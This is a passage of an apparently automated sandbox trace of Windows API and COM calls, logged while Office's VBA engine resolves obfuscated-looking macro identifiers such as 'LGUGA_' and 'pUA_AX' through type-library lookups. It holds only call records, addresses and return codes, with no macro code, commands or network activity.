0x107ad1 [0069.740] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.740] IUnknown:Release (This=0x665ba50) returned 0xd [0069.740] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.740] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.740] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.740] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.740] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.740] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.740] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.740] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.740] IUnknown:Release (This=0x665ba50) returned 0xd [0069.740] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.740] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.740] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.740] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.740] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.741] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.741] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.741] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.741] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.741] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.741] IUnknown:Release (This=0x665ba50) returned 0xd [0069.741] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.741] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.741] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.741] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.741] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.741] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.741] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.741] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.741] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.741] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.741] IUnknown:Release (This=0x665ba50) returned 0xd [0069.741] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.741] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.741] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b9a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="LGUGA_") returned 7 [0069.741] ITypeComp:RemoteBind (in: This=0x665ba60, szName="LGUGA_", lHashVal=0x104d1d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b9a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="LGUGA_") returned 7 [0069.742] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="LGUGA_", lHashVal=0x104d1d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b9a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="LGUGA_") returned 7 [0069.742] ITypeComp:RemoteBind (in: This=0x665bd30, szName="LGUGA_", lHashVal=0x104d1d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.742] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LGUGA_") returned 0x104d1d [0069.742] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="LGUGA_" | out: _Dst="LGUGA_") returned 0x0 [0069.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="LGUGA_") returned 7 [0069.742] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.742] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="LGUGA_", lHashVal=0x104d1d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.742] IUnknown:Release (This=0x665ba50) returned 0xd [0069.742] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.742] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="LGUGA_", lHashVal=0x104d1d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.742] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.742] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.742] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="LGUGA_", lHashVal=0x104d1d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.742] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.742] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.742] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="LGUGA_", lHashVal=0x104d1d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.742] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b9a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="LGUGA_") returned 7 [0069.742] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="LGUGA_", lHashVal=0x104d1d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.742] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.742] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81b9a | out: _Dst=0x67c2d40) returned 0x0 [0069.743] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_LGUGA_") returned 0x10c7c6 [0069.743] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_LGUGA_" | out: _Dst="_B_var_LGUGA_") returned 0x0 [0069.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_LGUGA_") returned 14 [0069.743] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.743] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_LGUGA_", lHashVal=0x10c7c6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.743] IUnknown:Release (This=0x665ba50) returned 0xd [0069.743] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.743] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_LGUGA_", lHashVal=0x10c7c6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.743] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.743] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.743] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_LGUGA_", lHashVal=0x10c7c6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.743] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.743] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.743] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_LGUGA_", lHashVal=0x10c7c6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.743] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.743] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.743] IUnknown:Release (This=0x665ba50) returned 0xd [0069.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870fae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_LGUGA_") returned 14 [0069.743] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_LGUGA_", lHashVal=0x10c7c6, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0069.743] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81b9a | out: _Dst=0x144ec0) returned 0x0 [0069.743] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KDkA_kk", lHashVal=0x109a4d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c8a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KDkA_kk") returned 8 [0069.743] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KDkA_kk", lHashVal=0x109a4d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c8a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KDkA_kk") returned 8 [0069.744] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KDkA_kk", lHashVal=0x109a4d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.744] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KDkA_kk") returned 0x109a4d [0069.744] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="KDkA_kk" | out: _Dst="KDkA_kk") returned 0x0 [0069.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="KDkA_kk") returned 8 [0069.744] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.744] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KDkA_kk", lHashVal=0x109a4d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.744] IUnknown:Release (This=0x665ba50) returned 0xd [0069.744] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.744] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KDkA_kk", lHashVal=0x109a4d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.744] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.744] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.744] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KDkA_kk", lHashVal=0x109a4d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.744] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.744] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.744] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KDkA_kk", lHashVal=0x109a4d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.744] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c8a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KDkA_kk") returned 8 [0069.744] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KDkA_kk", lHashVal=0x109a4d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.744] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.744] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81c8a | out: _Dst=0x67c2d40) returned 0x0 [0069.744] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KDkA_kk") returned 0x108e50 [0069.744] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_KDkA_kk" | out: _Dst="_B_var_KDkA_kk") returned 0x0 [0069.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_KDkA_kk") returned 15 [0069.744] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.744] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KDkA_kk", lHashVal=0x108e50, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.744] IUnknown:Release (This=0x665ba50) returned 0xd [0069.744] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.745] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KDkA_kk", lHashVal=0x108e50, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.745] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.745] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.745] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KDkA_kk", lHashVal=0x108e50, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.745] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.745] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.745] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KDkA_kk", lHashVal=0x108e50, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.745] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.745] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.745] IUnknown:Release (This=0x665ba50) returned 0xd [0069.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870fde, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_KDkA_kk") returned 15 [0069.745] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KDkA_kk", lHashVal=0x108e50, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0) returned 0x0 [0069.745] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81c8a | out: _Dst=0x144ec0) returned 0x0 [0069.745] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pUA_AX", lHashVal=0x10b171, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c62, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="pUA_AX") returned 7 [0069.745] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pUA_AX", lHashVal=0x10b171, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c62, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="pUA_AX") returned 7 [0069.745] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pUA_AX", lHashVal=0x10b171, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.745] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pUA_AX") returned 0x10b171 [0069.745] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="pUA_AX" | out: _Dst="pUA_AX") returned 0x0 [0069.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="pUA_AX") returned 7 [0069.746] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.746] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pUA_AX", lHashVal=0x10b171, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.746] IUnknown:Release (This=0x665ba50) returned 0xd [0069.746] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.746] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pUA_AX", lHashVal=0x10b171, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.746] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.746] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.746] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pUA_AX", lHashVal=0x10b171, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.746] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.746] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.746] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pUA_AX", lHashVal=0x10b171, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.746] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81c62, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="pUA_AX") returned 7 [0069.746] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pUA_AX", lHashVal=0x10b171, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.746] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.746] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81c62 | out: _Dst=0x67c2d40) returned 0x0 [0069.746] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pUA_AX") returned 0x102bdb [0069.746] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_pUA_AX" | out: _Dst="_B_var_pUA_AX") returned 0x0 [0069.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_pUA_AX") returned 14 [0069.746] IUnknown:AddRef (This=0x665ba50) returned 0xe 